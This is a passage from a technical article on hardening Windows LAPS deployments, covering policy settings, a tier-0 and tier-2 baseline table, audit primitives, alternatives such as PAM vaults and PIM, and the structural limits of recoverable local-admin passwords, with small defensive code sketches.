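    """SMB sessions on the host are deleted on values 3 and 11."""
    return action in (
        PostAuthenticationAction.RESET_AND_SIGN_OUT,
        PostAuthenticationAction.RESET_SIGN_OUT_AND_TERMINATE,
    )
```

With this in place, a policy file that sets the value to 2 fails fast with a readable message instead of being silently misapplied.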

PostAuthenticationResetDelay defaults to 24 hours. The range is 0 to 24 hours; a value of 0 disables the post-authentication action entirely [@ms-laps-policy-settings]. A tier-0 fleet aiming to close the screenshotted-password OPSEC tail aggressively will configure this down to 1 hour; tier-2 deployments typically leave it at 8 or 24.
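The delay semantics can be expressed as a small scheduling function. This sketch follows the rules stated above (default 24, range 0 to 24, 0 disables the action); `post_auth_action_due` is a hypothetical name, and the function models only the timing, not what the action does.

```python
from datetime import datetime, timedelta
from typing import Optional


def post_auth_action_due(authenticated_at: datetime,
                         delay_hours: int = 24) -> Optional[datetime]:
    """Return when the post-authentication action becomes due,
    or None when a delay of 0 disables it."""
    if not 0 <= delay_hours <= 24:
        raise ValueError("PostAuthenticationResetDelay must be between 0 and 24 hours")
    if delay_hours == 0:
        return None  # post-authentication action disabled
    return authenticated_at + timedelta(hours=delay_hours)
```

For a managed-account logon at 09:00 with the tier-0 setting of 1 hour, the function returns 10:00 the same day; with the default it returns 09:00 the next day.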

PasswordComplexity values 5 through 8 (Windows 11 24H2+ / Windows Server 2025+)

PasswordComplexity values 1 through 4 are character-class modes (uppercase only; uppercase plus lowercase; uppercase plus lowercase plus numbers; and -- value 4, the default -- all four character classes). Value 5 is not a "no vowels or numbers" mode, despite a common folk attribution; it is the "improved readability" four-class variant of value 4, equivalent to value 4 with the visually ambiguous glyphs I, O, Q, l, o, 0, 1 removed and the symbols :, =, ?, * added [@ms-laps-passwords-passphrases]. Microsoft's own documented example password for value 5 is vnJ!!?MTb5=U7Y -- which retains vowels and digits 2 through 9. Values 6, 7, and 8 are passphrase modes drawn from a Microsoft-curated wordlist derived from the EFF Diceware wordlists [@eff-dice; @eff-wordlists-2016] with internal modifications. The published word counts after Microsoft's curation are 7776 / 1276 / 1276 for modes 6 / 7 / 8 respectively; the EFF originals (the EFF Long Wordlist, EFF Short Wordlist #1, and EFF Short Wordlist #2 published July 2016) are 7776 / 1296 / 1296 [@eff-dice; @eff-wordlists-2016]. Values 5 through 8 are all gated on Windows 11 24H2 / Windows Server 2025 and later -- not only values 6-8. The cited Microsoft Learn page reads verbatim for value 5: "The PasswordComplexity setting of '5' is only supported in Windows 11 24H2, Windows Server 2025, and later releases." [@ms-laps-passwords-passphrases]. Passphrase modes exist for DSRM-account scenarios where the password must be typed by a human under duress; the article's section 7 baseline recommends them for tier-0 break-glass accounts.
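The wordlist sizes translate directly into entropy per word, which helps when choosing a passphrase length. The sketch below assumes each word is drawn uniformly and independently from the list, which is the standard Diceware model but is an assumption about the generator here; `passphrase_entropy_bits` is a hypothetical helper.

```python
import math

# Published word counts for PasswordComplexity modes 6, 7 and 8 (see above).
WORDLIST_SIZES = {6: 7776, 7: 1276, 8: 1276}


def passphrase_entropy_bits(complexity: int, words: int) -> float:
    """Entropy in bits of a passphrase of `words` words, assuming each word
    is chosen uniformly and independently from the mode's wordlist."""
    if complexity not in WORDLIST_SIZES:
        raise ValueError("passphrase modes are PasswordComplexity 6, 7 and 8")
    if words < 1:
        raise ValueError("a passphrase needs at least one word")
    return words * math.log2(WORDLIST_SIZES[complexity])
```

Under that model, a word from the 7776-entry list contributes about 12.9 bits and a word from a 1276-entry list about 10.3 bits, so a six-word mode-6 passphrase carries roughly 77.5 bits while a short-wordlist passphrase needs more words to match it.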

PowerShell surface and one important cmdlet name

The native LAPS PowerShell module ships eight cmdlets the article calls out by name: Get-LapsADPassword, Reset-LapsPassword, Update-LapsADSchema, Set-LapsADAuditing, Set-LapsADComputerSelfPermission, Set-LapsADReadPasswordPermission, Set-LapsADResetPasswordPermission, and Find-LapsADExtendedRights [@ms-laps-ps-overview; @ms-laps-get-adpassword]. The auditing cmdlet is Set-LapsADAuditing -- not Set-LapsADAuditingSettings, which does not exist as a cmdlet name [@ms-laps-set-adauditing]. The Entra-backup retrieval cmdlet is Get-LapsAADPassword, a wrapper around Microsoft Graph.

Note: A common copy-paste error in deployment runbooks is to write Set-LapsADAuditingSettings. The cmdlet name is Set-LapsADAuditing [@ms-laps-set-adauditing]. The cmdlet itself logs nothing: it installs a SACL that targets the LAPS attribute set, and Domain Controllers then record event 4662 when a configured attribute is read. You still need the host-side Audit Directory Service Access subcategory enabled on Domain Controllers for the event to land in the Security log.

Migration coexistence

Legacy LAPS and Windows LAPS can coexist on the same host only if they target different local accounts. The documented coexistence pattern is to run legacy LAPS against the built-in RID 500 Administrator while introducing Windows LAPS against a named secondary local-admin account, then retire the legacy MSI once Windows LAPS coverage is verified [@ms-laps-mig-scenarios]. Section 11 details the seven-step migration sequence.

flowchart TD
Tick["laps.dll background timer (~1 hr)"]
ReadPolicy["Read effective policy<br/>CSP > GPO > local > legacy emulation"]
BackupDir{"BackupDirectory<br/>1 (Entra) / 2 (AD) / 0?"}
EntraPath["Write to Graph deviceLocalCredentials<br/>(min PasswordAgeDays = 7)"]
ADPath["Write to msLAPS-* attribute set<br/>(min PasswordAgeDays = 1)"]
EncryptionGate{"ADPasswordEncryptionEnabled = True<br/>AND DFL ≥ Server 2016?"}
Encrypted["msLAPS-EncryptedPassword<br/>(DPAPI-NG, principal = ADPasswordEncryptionPrincipal)"]
Plaintext["msLAPS-Password (plaintext fallback)"]
SetSAM["Set SAM password on<br/>AdministratorAccountName (empty = RID 500)"]
Auth["Managed account authenticates"]
PAA{"PostAuthenticationActions<br/>0 / 1 / 3 / 5 / 11?"}
Wait["Wait PostAuthenticationResetDelay (default 24 h)"]
Action1["1: reset password"]
Action3["3: reset + sign out, 2-min warning, DEFAULT"]
Action5["5: reset + reboot, 1-min delay"]
Action11["11: reset + sign out + terminate procs (24H2 / WS2025+)"]
Tick --> ReadPolicy
ReadPolicy --> BackupDir
BackupDir -- 1 --> EntraPath
BackupDir -- 2 --> EncryptionGate
BackupDir -- 0 --> SetSAM
EncryptionGate -- yes --> Encrypted
EncryptionGate -- no --> Plaintext
EntraPath --> SetSAM
Encrypted --> SetSAM
Plaintext --> SetSAM
SetSAM --> Auth
Auth --> Wait
Wait --> PAA
PAA -- 1 --> Action1
PAA -- 3 --> Action3
PAA -- 5 --> Action5
PAA -- 11 --> Action11
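The first half of the flowchart above (read the effective policy, then pick a backup target) can be sketched as two small functions. This is an illustration under stated assumptions, not the logic inside laps.dll: the precedence order is the one the flowchart gives, the `sources` object shape and the `dflAtLeast2016` flag are hypothetical, and treating the winning policy source as all-or-nothing rather than merged per setting is an assumption of the sketch.

```javascript
// Precedence order as given in the flowchart: CSP > GPO > local > legacy emulation.
const PRECEDENCE = ["csp", "gpo", "local", "legacyEmulation"];

// Return the first source that carries any LAPS settings (all-or-nothing;
// that behaviour is an assumption of this sketch).
function effectivePolicy(sources) {
  for (const name of PRECEDENCE) {
    const policy = sources[name];
    if (policy && Object.keys(policy).length > 0) return { source: name, policy };
  }
  return { source: null, policy: {} };
}

// `dflAtLeast2016` is a hypothetical boolean the caller derives from the domain.
function backupTarget(policy, dflAtLeast2016) {
  switch (policy.BackupDirectory) {
    case 1:
      return "entra:deviceLocalCredentials";
    case 2:
      // Encryption needs the policy bit (default True) AND the DFL prerequisite;
      // otherwise the password lands in the plaintext attribute.
      return policy.ADPasswordEncryptionEnabled !== false && dflAtLeast2016
        ? "ad:msLAPS-EncryptedPassword"
        : "ad:msLAPS-Password";
    default:
      return "none"; // BackupDirectory 0: no directory backup
  }
}
```

The same two functions make the hybrid-joined ambiguity concrete: a device that receives `BackupDirectory = 2` by GPO and `BackupDirectory = 1` by CSP resolves to the Entra target under this precedence order.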

With the in-box era settled, what does a 2026 deployment actually look like? A short list of policy settings, and a slightly longer list of footguns.

7. The 2026 Baseline as a Settings Table

Architecture is interesting. Audits are not. Here is the 2026 settings table that, in production, separates a deployment that meets its goal from one that quietly does not. Every row carries the policy node, the documented default, the recommended tier-2 value (a typical end-user fleet), the recommended tier-0 value (Domain Controllers and break-glass), the rationale, and the citation. Cross-check each row against the Microsoft Learn policy-settings page before you ship it.

Policy	Default	Recommended (tier 2)	Recommended (tier 0)	Why	Citation
`BackupDirectory`	`0` (no backup)	`2` (AD) for AD-joined and hybrid-joined; `1` (Entra) for pure Entra-joined	same as tier 2	One directory per device; AD for hybrid where on-prem identity is canonical	[@ms-laps-policy-settings]
`PasswordComplexity`	`4` (all character classes)	`4`	`6` (passphrase drawn from the long wordlist) for accounts a human must type under duress (DSRM / break-glass); `4` for automated retrieval	Passphrases for human typing; character-set for tool-only retrieval. Values 5 through 8 are gated on Windows 11 24H2 / Windows Server 2025 and later: value 5 is the "improved-readability" four-class variant of 4 (not a "no vowels" mode); values 6/7/8 are passphrase modes with Microsoft-curated EFF-derived wordlists of 7776 / 1276 / 1276 entries (EFF originals: 7776 / 1296 / 1296)	[@ms-laps-passwords-passphrases; @eff-dice; @eff-wordlists-2016]
`PasswordLength`	`14`	`24`	`24`	Eliminates the rainbow-table threat class	[@ms-laps-passwords-passphrases]
`PasswordAgeDays`	`30` (1-day minimum AD; 7-day minimum Entra; 365-day max)	`30`	`1` (AD) / `7` (Entra; lower fails policy validation)	Caps the blast radius of an undetected credential theft to one rotation window	[@ms-laps-policy-settings]
`PostAuthenticationActions`	`3` (reset + sign out)	`3`	`3`, or `11` on Win 11 24H2+ if process termination is required	Closes the screenshot-leak OPSEC tail on the next managed-account interactive logon. Value `11` is not "force shutdown without warning" -- it is reset + sign out + terminate remaining processes with the same two-minute warning as `3`	[@ms-laps-policy-settings]
`PostAuthenticationResetDelay`	`24` (hours)	`8`	`1`	Trade-off between operational task completion and exposure window	[@ms-laps-policy-settings]
`ADPasswordEncryptionEnabled`	`True` per Microsoft Learn's defaults table -- not off-by-default	`True`, configured explicitly so the choice is visible in policy audits and the DFL prerequisite is verified	same	The genuine failure mode is silent fallback to plaintext when DFL is below Server 2016 or `BackupDirectory` is not `2`, not a default-off bit	[@ms-laps-policy-settings; @ms-laps-csp]
`ADPasswordEncryptionPrincipal`	`Domain Admins` of the computer's domain when unspecified	Dedicated `LAPS-DPAPI-Decryptors` group, not Domain Admins	same, with PIM-gated activation	Decryption authority is delegated separately from LDAP read; minimise membership	[@ms-laps-concepts-overview]
`AdministratorAccountName`	empty (manages built-in RID 500)	empty on Server SKUs; named account (e.g. `lapsadmin`) on Client SKUs with the built-in disabled	On Win 11 24H2 / WS2025+, prefer Automatic Account Management with random name and disabled-by-default	Defeats predictable-RID-500 enumeration	[@ms-laps-policy-settings; @ms-laps-account-modes]
`ADBackupDSRMPassword`	`False`	n/a (member servers)	`True` on Domain Controllers	Brings DSRM-account management into LAPS scope -- a capability legacy LAPS never had	[@ms-laps-concepts-overview]

Tier-0 deviations from the tier-2 baseline are narrow but consequential. (a) `PasswordAgeDays` to 1 (AD) or 7 (Entra) caps the undetected-theft window. (b) `PostAuthenticationResetDelay` to 1 hour aggressively rotates after legitimate use. (c) `ADPasswordEncryptionPrincipal` to a dedicated decryptor group with PIM-gated activation [@ms-entra-pim] -- not standing membership. (d) `ADBackupDSRMPassword = True` only on DCs, so the Directory Services Restore Mode account is in LAPS scope. (e) `PasswordComplexity = 6` on accounts that a human must type under duress (DSRM, ESAE break-glass), `4` everywhere else. The tier-0 baseline is more expensive operationally -- daily rotation and 1-hour post-auth delay create a non-trivial volume of password reads through the decryption group -- and the cost is the entire point. Anything cheaper does not warrant the tier-0 label.
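A baseline like the one in the table is easiest to hold when it is checked mechanically. The following is a minimal linter sketch: the thresholds are taken from the table above, while the shape of the `policy` object and the wording of the findings are hypothetical. Unset values fall back to the documented defaults quoted in the table.

```javascript
// Minimal policy linter for the baseline table. Thresholds come from the
// table; the `policy` object shape is a hypothetical export format.
function lintLapsPolicy(policy) {
  const findings = [];
  const minAge = policy.BackupDirectory === 1 ? 7 : 1; // Entra vs AD minimum
  const age = policy.PasswordAgeDays ?? 30;            // documented default
  const delay = policy.PostAuthenticationResetDelay ?? 24;

  if (![1, 2].includes(policy.BackupDirectory)) {
    findings.push("BackupDirectory is not 1 (Entra) or 2 (AD): no backup");
  }
  if (age < minAge || age > 30) {
    findings.push(`PasswordAgeDays should be between ${minAge} and 30`);
  }
  if (policy.BackupDirectory === 2) {
    // The baseline asks for an explicit True, not a reliance on the default.
    if (policy.ADPasswordEncryptionEnabled !== true) {
      findings.push("ADPasswordEncryptionEnabled is not explicitly True");
    }
    const principal = policy.ADPasswordEncryptionPrincipal;
    if (!principal || /domain admins/i.test(principal)) {
      findings.push("ADPasswordEncryptionPrincipal should be a dedicated group");
    }
  }
  if (!(delay >= 1 && delay <= 24)) {
    findings.push("PostAuthenticationResetDelay should be 1-24 hours (0 disables)");
  }
  return findings;
}
```

An empty array means the policy meets the tier-2 row of the table; tier-0 checks (for example `PasswordAgeDays` of 1 or 7) would tighten the same thresholds.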

Note: The single most useful hardening move on a Windows LAPS deployment is to explicitly set ADPasswordEncryptionPrincipal to a dedicated group with minimum membership. The default (Domain Admins of the computer's domain) is operationally correct, since Domain Admins should be the readers of last resort, but architecturally lazy, since most fleets do not want their DA group to be the routine LAPS-read group. Name the group something searchable -- LAPS-DPAPI-Decryptors is a defensible convention -- and add helpdesk LAPS readers to that group, gated by Entra PIM activation [@ms-entra-pim] for non-emergency reads.

The audit-primitives sub-table

The decision of which tool answers which question is, in practice, the difference between a LAPS deployment that meets its goal and one that quietly does not. The six primitives:

Primitive	Question it answers	Primary source
BloodHound `ReadLAPSPassword` edge	Which principals can read the LAPS password on which computer objects, transitively across the graph?	[@bloodhound-edge-readlaps]
PingCastle `A-LAPS-Not-Installed`	Does this domain have any LAPS solution installed for the native local administrator account?	[@pingcastle-rules]
PingCastle `A-LAPS-Joined-Computers`	Can a user who manually domain-joined a computer (via `mS-DS-CreatorSID` ownership) still read that computer's LAPS password?	[@pingcastle-rules]
PingCastle `A-PwdGPO`	Does this domain still have residual GPP `cpassword` artefacts in SYSVOL? (MITRE T1552.006)	[@pingcastle-rules; @mitre-t1552-006]
Windows event 4662 on `msLAPS-*` (SACL via `Set-LapsADAuditing`)	Who read which LAPS attribute on which computer object, and when?	[@ms-laps-set-adauditing; @ms-laps-ps-overview]
Entra audit log + Graph `GET /directory/deviceLocalCredentials/{deviceId}` reads	Who retrieved which LAPS password from Microsoft Entra ID (`BackupDirectory = 1`), and when?	[@ms-graph-localcredinfo; @ms-laps-entra-scenarios]

No Microsoft Defender for Identity alert in the current public taxonomy names LAPS specifically [@ms-defender-alerts]; instead, lean on the event 4662 SACL primitive plus advanced hunting in the IdentityDirectoryEvents table for principal-pattern anomalies. Microsoft's Compromised Credentials and Lateral Movement categories surface the downstream behaviour when a stolen LAPS password gets used.

{`
// In production, run:
//   Get-LapsADPassword -Identity * | Where-Object {
//     $_.ExpirationTimestamp -lt (Get-Date) -or $_.Source -eq 'Plaintext'
//   }
// This in-browser demo mirrors the same logic against an array of mock computer objects.

const ONE_DAY_MS = 86400000;
const computers = [
  { name: "WS-001", msLapsExpiry: Date.now() + 5 * ONE_DAY_MS, encrypted: true },
  { name: "WS-002", msLapsExpiry: Date.now() - 2 * ONE_DAY_MS, encrypted: true },
  { name: "WS-003", msLapsExpiry: null, encrypted: false },
  { name: "WS-004", msLapsExpiry: Date.now() + 1 * ONE_DAY_MS, encrypted: false },
];

// Flag a computer when its password is missing, expired, or stored unencrypted.
const now = Date.now();
const gaps = computers
  .filter((c) => c.msLapsExpiry === null || c.msLapsExpiry < now || !c.encrypted)
  .map((c) => c.name);

console.log(gaps.length === 0
  ? "All computers have current, encrypted LAPS passwords"
  : "Coverage gaps:\n " + gaps.join("\n "));
`}

The AdministratorAccountName decision deserves one paragraph of its own. On Server SKUs, the built-in Administrator (RID 500) is enabled by default, and leaving the policy empty manages it -- this is what most deployments want. On Client SKUs the built-in is disabled by default; many shops create a named admin account (a common convention is lapsadmin) and set AdministratorAccountName to that name. On Windows 11 24H2 and Windows Server 2025 and later, the better answer is Automatic Account Management: set AutomaticAccountManagementEnabled = 1, AutomaticAccountManagementRandomizeName = 1, and AutomaticAccountManagementEnableAccount = 0, and the host will auto-create a randomised-name disabled-by-default local-admin account that Windows LAPS owns end to end [@ms-laps-account-modes]. The result is that an attacker enumerating local accounts cannot guess the LAPS-managed account name from RID 500, RID 1000, or any other predictable identifier.

This is the baseline. But LAPS is not the only answer to "who knows the local admin password." For three classes of fleet, the right answer is something else.

8. When LAPS Is Not the Right Tool

Three classes of fleet should not -- or should not only -- run Windows LAPS. The first wants a workflow LAPS does not offer. The second wants no standing local admin at all. The third is orthogonal: it changes the in-session elevation surface without changing the recoverable break-glass.

Third-party Privileged Access Management (PAM) vaults. Delinea Secret Server [@delinea-secretserver], CyberArk Endpoint Privilege Manager [@cyberark-epm], and BeyondTrust Password Safe are the dominant 2026 commercial offerings in the category. The case for running a PAM vault alongside (or instead of) Windows LAPS is rarely about cryptography and almost always about workflow. PAM vaults bring multi-factor authentication on checkout, full session recording, dual-approval gates for high-risk accounts, and cross-OS scope (Windows, macOS, Linux, network gear, hypervisors) under one ACL model. The total cost of ownership is higher than LAPS; the security model, properly deployed, is comparable. Many shops run both: Windows LAPS for the workstation floor, PAM for tier-0 break-glass with session recording. The split is a workflow trade-off, not an architectural one.

Zero standing local admin plus Entra PIM JIT elevation. Tier-0 fleets that have reached the "no routine local admin" architectural state disable the built-in RID 500 entirely and gate every admin operation through just-in-time elevation. Microsoft Entra Privileged Identity Management [@ms-entra-pim] supports the eligibility / activation / approval workflow at scale: an operator is eligible for an admin role, activates it for a bounded duration with optional MFA and ticket reference, and an approver signs off on the activation if policy requires. Windows LAPS coexists in this model as the absolute-last-resort break-glass mechanism -- for the case where Entra itself is down, the network is partitioned, and a human has to walk to a console and type a password. The architectural alignment is with MITRE T1078.001 (Default Accounts) [@mitre-t1078-001]: if the default account is permanently disabled and only re-enabled under PIM workflow, the entire technique class is bounded by the PIM activation log.

Windows 11 25H2 Administrator Protection. Per-elevation transient admin sessions arrived as a Tech Community preview in late 2025 [@tc-admin-protection-win11]. The feature creates a temporary, isolated "shadow admin" identity for the duration of each elevation prompt, brokering UAC-class elevation through a per-elevation token that is destroyed when the elevated process exits. This is orthogonal to LAPS, not a replacement. Administrator Protection addresses in-session UAC elevation; Windows LAPS addresses the recoverable break-glass password for off-network and non-bootable recovery. The two systems answer different questions. Conflating them produces designs that drop LAPS in favour of Administrator Protection and then discover, six months later, that there is no recovery primitive for a laptop that has been off the corporate network for a year.

Situation	Recommended method
On-premises AD-joined, no Entra ID	A -- in-box Windows LAPS with AD backup
Microsoft Entra hybrid-joined, on-prem AD authoritative	A -- Microsoft's current hybrid recommendation
Pure Entra-joined, no on-prem AD	B -- in-box Windows LAPS with Entra ID backup
Stuck on Windows Server 2016 (excluded from Windows LAPS)	C -- legacy MSI LAPS until OS migration completes
In active migration from legacy LAPS to Windows LAPS	C in side-by-side mode with different managed accounts
Non-Windows scope (Linux, macOS, network gear) needs unified vaulting	D -- third-party PAM vault, often alongside A/B
Regulated industry requiring session recording / MFA checkout	D alongside A/B
Tier-0 fleet with a zero-standing-credential goal and Entra ID P2	E -- PIM-gated JIT elevation layered on A or B
Windows 11 fleet wanting in-session credential-theft mitigation	F -- Administrator Protection alongside A/B (orthogonal)
BYOD, workgroup, or unmanaged endpoints	None of A through F -- enrollment is the answer, not LAPS
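The table above can be read as a small decision function. The sketch below is one possible encoding, not an official selection algorithm: the `fleet` flag names are hypothetical, and the returned letters are the table's own method labels.

```javascript
// Sketch of the situation-to-method table. `fleet` flags are hypothetical names.
function recommendMethods(fleet) {
  if (fleet.unmanaged) return []; // BYOD / workgroup: enrolment comes first
  const methods = [];
  // C covers hosts stuck on WS2016 and the side-by-side migration window.
  if (fleet.stuckOnWS2016 || fleet.migratingFromLegacy) methods.push("C");
  // WS2016 hosts cannot run Windows LAPS, so A/B only apply elsewhere.
  if (!fleet.stuckOnWS2016) {
    methods.push(fleet.join === "entra" ? "B" : "A"); // "ad" and "hybrid" map to A
  }
  if (fleet.nonWindowsScope || fleet.needsSessionRecording) methods.push("D");
  if (fleet.tier0ZeroStanding) methods.push("E");
  if (fleet.wantsElevationHardening) methods.push("F");
  return methods;
}

console.log(recommendMethods({ join: "hybrid", tier0ZeroStanding: true }));
```

An empty result is deliberate: for unmanaged endpoints the table's answer is enrolment, and no method letter applies.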

flowchart TD
Start["Local-admin password problem for a fleet"]
BYOD{"BYOD or unmanaged?"}
EnrollFirst["Enrollment is the answer, not LAPS"]
Join{"AD-joined / hybrid / Entra-joined?"}
WS2016{"Stuck on WS2016 or in migration?"}
Tier0{"Tier 0 with zero-standing-credential goal?"}
CrossOS{"Non-Windows scope or checkout workflow needed?"}
WinElev{"Win 11 25H2 in-session elevation hardening?"}
MA["Method A: Windows LAPS, AD backup"]
MB["Method B: Windows LAPS, Entra backup"]
MC["Method C: legacy MSI LAPS"]
MD["Method D: PAM vault, alongside A/B"]
ME["Method E: PIM-gated JIT, layered on A/B"]
MF["Method F: Administrator Protection (orthogonal)"]
Start --> BYOD
BYOD -- yes --> EnrollFirst
BYOD -- no --> Join
Join -- AD or hybrid --> MA
Join -- pure Entra --> MB
MA --> WS2016
MB --> WS2016
WS2016 -- yes --> MC
WS2016 -- no --> Tier0
Tier0 -- yes --> ME
Tier0 -- no --> CrossOS
CrossOS -- yes --> MD
CrossOS -- no --> WinElev
WinElev -- yes --> MF

The terminology is genuinely confusing. *Microsoft Entra hybrid joined* is a device join state: the workstation is joined to both an on-premises AD domain and Microsoft Entra ID, and both directories know about it. A *Hybrid Runbook Worker*, by contrast, is an Azure Automation primitive that runs Automation runbooks on a worker process inside an on-premises environment. They share a word and nothing else. Windows LAPS policy for hybrid-*joined* devices is a `BackupDirectory` choice (typically AD for on-prem-authoritative hybrid fleets, Entra for Entra-authoritative); Hybrid Runbook Workers are an Azure Automation concern and entirely outside the LAPS scope.

All six answers above -- methods A through F -- have a structural ceiling. There is one bound none of them can break.

9. What LAPS Structurally Cannot Solve

Every recoverable-secret system has a privileged reader. Whether you call it ADPasswordEncryptionPrincipal, a "CyberArk vault admin," or a "PIM eligible approver," somebody can break the glass -- which means somebody can compromise the glass. This is a lower bound, not an implementation defect.

The eleven-year arc converged on a tight bound. It did not abolish the underlying problem. Four structural limits are worth naming, because each maps onto a real residual attack surface in 2026 deployments.

Bound 1: at least one reader exists, by construction. Symbolically, $|\text{readers}| \geq 1$. CNG DPAPI's group-key-protector substitution does not eliminate the privileged class; it relocates the trust boundary. The boundary moves from "every principal with LDAP read on the attribute" (legacy LAPS) to "every principal in the configured ADPasswordEncryptionPrincipal group at decryption time" (Windows LAPS). The relocation tightens the bound by orders of magnitude in typical fleets -- a LAPS-DPAPI-Decryptors group with five members beats an "All Extended Rights on the helpdesk OU" delegation with five hundred -- but it does not move the bound to zero. The directory that stores the LAPS secret remains a tier-0 asset, and the decryptor group remains a tier-0 principal class.

Every recoverable secret has a privileged reader. The architectural game is to make the reader class small, audited, time-bounded, and reachable from the directory only through Kerberos. The game is not to make the reader class empty. That game has no winning move.

Bound 2: the out-of-protocol OPSEC tail. Once a plaintext password leaves the directory -- pasted into a helpdesk ticket, screenshotted into a Slack DM, stored in a shared KeePass database that the team forgot to rotate -- the protocol's rotation knob is the only remaining mitigation. PostAuthenticationActions only fires after the next managed-account interactive logon [@ms-laps-policy-settings]; pre-logon exposure is bounded only by PasswordAgeDays. A password screenshotted into a chat log at 10:14 AM and never used is the password on that endpoint for the remainder of the configured rotation window, regardless of whether anyone has noticed the leak. The protocol does not, and cannot, solve "the password is now in a chat log."
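The exposure window in Bound 2 is simple arithmetic. The sketch below is a simplification that ignores the granularity of the background timer; `hoursSinceRotation` and `usedForLogon` are hypothetical inputs an analyst would supply, not fields LAPS exposes under those names.

```javascript
// Worst-case hours a leaked password stays valid, following the reasoning above.
function worstCaseExposureHours({ passwordAgeDays, postAuthDelayHours, hoursSinceRotation, usedForLogon }) {
  // Scheduled rotation is the only bound if the password is never used.
  const untilScheduledRotation = Math.max(0, passwordAgeDays * 24 - hoursSinceRotation);
  // Post-authentication reset applies only after the account has authenticated,
  // and a delay of 0 disables the action.
  if (usedForLogon && postAuthDelayHours > 0) {
    return Math.min(untilScheduledRotation, postAuthDelayHours);
  }
  return untilScheduledRotation;
}

// A password leaked two days after rotation and never used, on a 30-day policy.
console.log(worstCaseExposureHours({
  passwordAgeDays: 30, postAuthDelayHours: 24, hoursSinceRotation: 48, usedForLogon: false,
}));
```

With the tier-0 values from section 7 (`PasswordAgeDays` of 1 on AD), the same unused leak is bounded to under a day, which is the whole argument for the shorter rotation window.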

Bound 3: unmanaged and BYOD endpoints. A machine that is neither AD-joined nor Microsoft Intune-managed has no LAPS policy applied to it. Personal-device BYO MAM scope is outside the LAPS protection model entirely. The fix for these endpoints is enrollment, not LAPS. A non-trivial portion of the residual local-admin-password risk in 2026 is concentrated on the long tail of unmanaged endpoints that exist precisely because management was politically or contractually infeasible. The protocol does not solve this; governance solves this.

Bound 4: verification asymmetry. The directory's audit log says what it chose to log. An unprivileged observer cannot verify enforcement from outside the directory. This is the structural ceiling that motivates external audit primitives -- PingCastle [@pingcastle-rules], BloodHound [@bloodhound-edge-readlaps], Defender for Identity [@ms-defender-alerts] -- because they sit outside the directory's own self-report. The bound cannot be closed inside the protocol; only an out-of-band attestation primitive can certify enforcement to a party that does not trust the directory.

Key idea: Somebody has to break the glass. The decryptor group is the new tier-0 asset; LAPS bounds the problem, it does not abolish it. The eleven-year arc was a convergence on a tighter bound, not an arrival at a clean answer. The right framing for the 2026 baseline is "the residual attack surface is now the actual attack surface, rather than an artefact of incomplete shipping." That is real progress -- it just is not closure.

A structurally tighter design would have three properties: threshold cryptography so no single principal can decrypt (an $m$-of-$n$ Shamir secret-sharing scheme over the password protector, with $m \geq 2$ in tier-0 fleets); attestation-bound retrieval so the decryptor's device state is part of the decryption policy (Azure Managed HSM's secure-key-release policy grammar [@ms-mhsm-policy-grammar] is the closest shipping primitive that approaches this -- a key-release decision conditioned on attestation claims like `x-ms-attestation-type` or `tee:sevsnpvm`); and a ledger-of-reads so every retrieval is recorded on a tamper-evident substrate that the directory itself cannot rewrite (Azure Confidential Ledger [@ms-conf-ledger] is the closest shipping primitive on the Microsoft side). None of these three are wired into Windows LAPS in 2026. Each exists as an adjacent Microsoft product. The architectural integration -- a Windows LAPS that requires two `LAPS-DPAPI-Decryptors` members to co-sign a retrieval, attests the retrieving device's state at decryption time, and writes the retrieval event to an append-only ledger the directory cannot edit -- is engineering work that nobody has shipped.
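The threshold property in the first of those three requirements is easy to demonstrate in isolation. The following is a toy $m$-of-$n$ Shamir sketch over a prime field using BigInt. It is illustrative only: Windows LAPS does not do this today, the field size and helper names are choices made for this example, and a real design would wrap a key rather than split a password directly.

```javascript
// Toy m-of-n Shamir secret sharing over a prime field. Not production code.
const PRIME = 2n ** 127n - 1n; // Mersenne prime; secrets must be smaller than this

const mod = (a) => ((a % PRIME) + PRIME) % PRIME;

// Modular exponentiation, used for inversion via Fermat's little theorem.
function modPow(base, exp) {
  let result = 1n;
  base = mod(base);
  while (exp > 0n) {
    if (exp & 1n) result = mod(result * base);
    base = mod(base * base);
    exp >>= 1n;
  }
  return result;
}
const modInv = (a) => modPow(a, PRIME - 2n);

// Random field element from Web Crypto; throws if no global `crypto` exists.
function randomFieldElement() {
  const bytes = new Uint8Array(32);
  globalThis.crypto.getRandomValues(bytes);
  let x = 0n;
  for (const b of bytes) x = (x << 8n) | BigInt(b);
  return mod(x);
}

// Split `secret` into n shares, any m of which reconstruct it.
// `rand` is injectable so tests can be deterministic.
function split(secret, m, n, rand = randomFieldElement) {
  const coeffs = [mod(secret)];
  for (let i = 1; i < m; i++) coeffs.push(rand());
  const shares = [];
  for (let x = 1n; x <= BigInt(n); x++) {
    let y = 0n;
    // Horner evaluation of the degree m-1 polynomial at x.
    for (let i = coeffs.length - 1; i >= 0; i--) y = mod(y * x + coeffs[i]);
    shares.push({ x, y });
  }
  return shares;
}

// Lagrange interpolation at x = 0 recovers the constant term (the secret).
function combine(shares) {
  let secret = 0n;
  for (const { x: xi, y: yi } of shares) {
    let num = 1n;
    let den = 1n;
    for (const { x: xj } of shares) {
      if (xj === xi) continue;
      num = mod(num * -xj);
      den = mod(den * (xi - xj));
    }
    secret = mod(secret + yi * num * modInv(den));
  }
  return secret;
}
```

With `m = 2`, any two decryptor-held shares reconstruct the secret and any single share reveals nothing about it, which is the "no single principal can decrypt" property the paragraph asks for.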

Some of those structural bounds map onto open problems with no clean 2026 answer. We close on six of them.

10. Open Problems in 2026

This section covers six open problems in local-admin password management for which no first-party Microsoft answer ships in 2026. Each gets one paragraph, framed as "what is the question," "what has been tried," and "what is the current best partial result."

Open question	What has been tried	Current best partial result
Legacy SYSVOL `cpassword` cleanup at scale	MS14-025 (UI disable, no remediation); PingCastle scanning; community `Get-GPPDeployedPasswords`	Third-party scan-and-manual-delete; no first-party cmdlet ships in the OS
Cross-tenant / cross-directory LAPS coverage report	Microsoft Intune compliance reports; manual `Get-LapsADPassword` and `Get-LapsAADPassword` joins	DIY KQL across two directories; no unified portal report
Hybrid-joined `BackupDirectory` ambiguity	Microsoft Learn guidance ("AD for hybrid")	Most shops configure both and reconcile downstream
Win 11 25H2 Administrator Protection and LAPS interaction	Tech Community guidance; Microsoft Learn architectural notes	Operate them as orthogonal, with no architectural integration
LDAP channel binding / signing enforcement migration	Microsoft KB4520412 enforcement push 2020-2024; cross-platform tool updates	Some Linux pentest tooling still incomplete; `bloodyAD` / `lapsv2decrypt` lead the field [@kb4520412-canonical]
